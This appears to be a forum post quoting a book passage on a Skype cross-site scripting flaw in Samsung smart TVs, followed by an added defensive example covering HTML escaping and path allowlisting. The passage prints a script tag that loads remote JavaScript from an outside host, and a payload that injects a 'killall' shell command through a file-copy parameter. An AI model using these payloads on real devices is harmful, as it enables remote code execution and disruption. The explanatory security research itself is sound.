Abusing the Internet of Things

(Rick Simeone) #1
PluginAPIMgr.GetMyStorageInfo = function()
{
    alert("PluginAPIMgr.GetMyStorageInfo");
    var result = this.ExWidgetInterfacePlugin.Execute("ReadWidgetData", "SkypeInfo");
    return result;
}

In JavaScript, the alert function is used to pop up a dialog box and display the string
passed in as a parameter. However, in this case, the Samsung TV was actually logging the
given string to a local file. The researchers realized that this meant that Samsung had modified
the actual JavaScript interpreter and that the JavaScript platform was able to perform local
file and system operations. This is interesting because JavaScript code running in a typical
web browser is usually not allowed to perform system-level operations like these (without
some explicit tweaking). This means that a simple flaw in the app could result in a remotely
exploitable condition.
The popular XSS (Cross Site Scripting) attack vector usually depends upon the inability of
a web application to validate HTML characters (<, >, /, etc.), which in turn allows attackers to
inject malicious JavaScript code. Quite similar to an XSS attack, the researchers found a lack
of validation in the mood message. Mood messages in Skype are basically status messages
such as “Just had coffee, a little jittery today!” or “Out and about, may not respond immediately
so be patient!” Now imagine a mood message like the following:


<script src="http://tv.isecpartners.com/reboot.js"></script>

Suppose someone sent you a message on Skype with this as his mood message. You’d
expect the app to display the mood message as the literal string above. But instead, the Skype
app processes the string as code and executes it. This causes the Skype app to fetch reboot.js
and process the code in it! Now imagine if the following were the content of reboot.js:


fileobject = document.createElement('object');
fileobject.setAttribute("id", "pluginObjectFile");
fileobject.setAttribute("classid", "clsid:SAMSUNG-INFOLINK-FILESYSTEM");
document.getElementsByTagName("body")[0].appendChild(fileobject);
filePlugin = document.getElementById('pluginObjectFile');
// Kill exeDSP, forcing reboot
filePlugin.Copy("/proc/self/cmdline", "\$(killall exeDSP)/tmp/foo");

Notice the parameters to filePlugin.Copy. Grattafiori and Yavor noted that they could
inject the killall exeDSP command as a parameter, causing the TV to reboot since the
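
The defensive counterpart to the two flaws described above (the unvalidated mood message and the command injected through the filePlugin.Copy parameter), as an added example that is not from the book or from Samsung's code. The names escapeHtml, renderMoodUnsafe, renderMoodSafe, isPlainPath and safeCopy are hypothetical, and the path guard assumes the copy routine hands its arguments to a shell.

```javascript
// Constructed sample input: the mood message quoted in the text.
const MOOD = '<script src="http://tv.isecpartners.com/reboot.js"></script>';

const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '/': '&#47;',
};

// Encode every character that can open or close a tag or an attribute value.
function escapeHtml(text) {
  return String(text).replace(/[&<>"'\/]/g, (ch) => HTML_ENTITIES[ch]);
}

// The flawed pattern: untrusted text concatenated straight into markup.
function renderMoodUnsafe(mood) {
  return '<div class="mood">' + mood + '</div>';
}

// Hardened: the mood message is data, so it is encoded before it reaches markup.
function renderMoodSafe(mood) {
  return '<div class="mood">' + escapeHtml(mood) + '</div>';
}

// Hypothetical guard for a file-copy API whose arguments may reach a shell
// (an assumption): allow only absolute paths built from plain characters.
function isPlainPath(path) {
  if (typeof path !== 'string' || path.length === 0 || path.length > 255) return false;
  if (!/^\/[A-Za-z0-9._\/-]*$/.test(path)) return false; // rejects $ ( ) ` ; | and spaces
  return !path.split('/').includes('..');                // rejects directory traversal
}

// Wrap the copy primitive so it is never reached with a rejected argument.
function safeCopy(copyFn, src, dst) {
  if (!isPlainPath(src) || !isPlainPath(dst)) {
    throw new Error('rejected path argument');
  }
  return copyFn(src, dst);
}
```

Encoding at output time keeps the mood message visible to the user as text, while the allowlist on path arguments fails closed on anything that is not a plain absolute path.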


144 CHAPTER 5: THE IDIOT BOX—ATTACKING “SMART” TELEVISIONS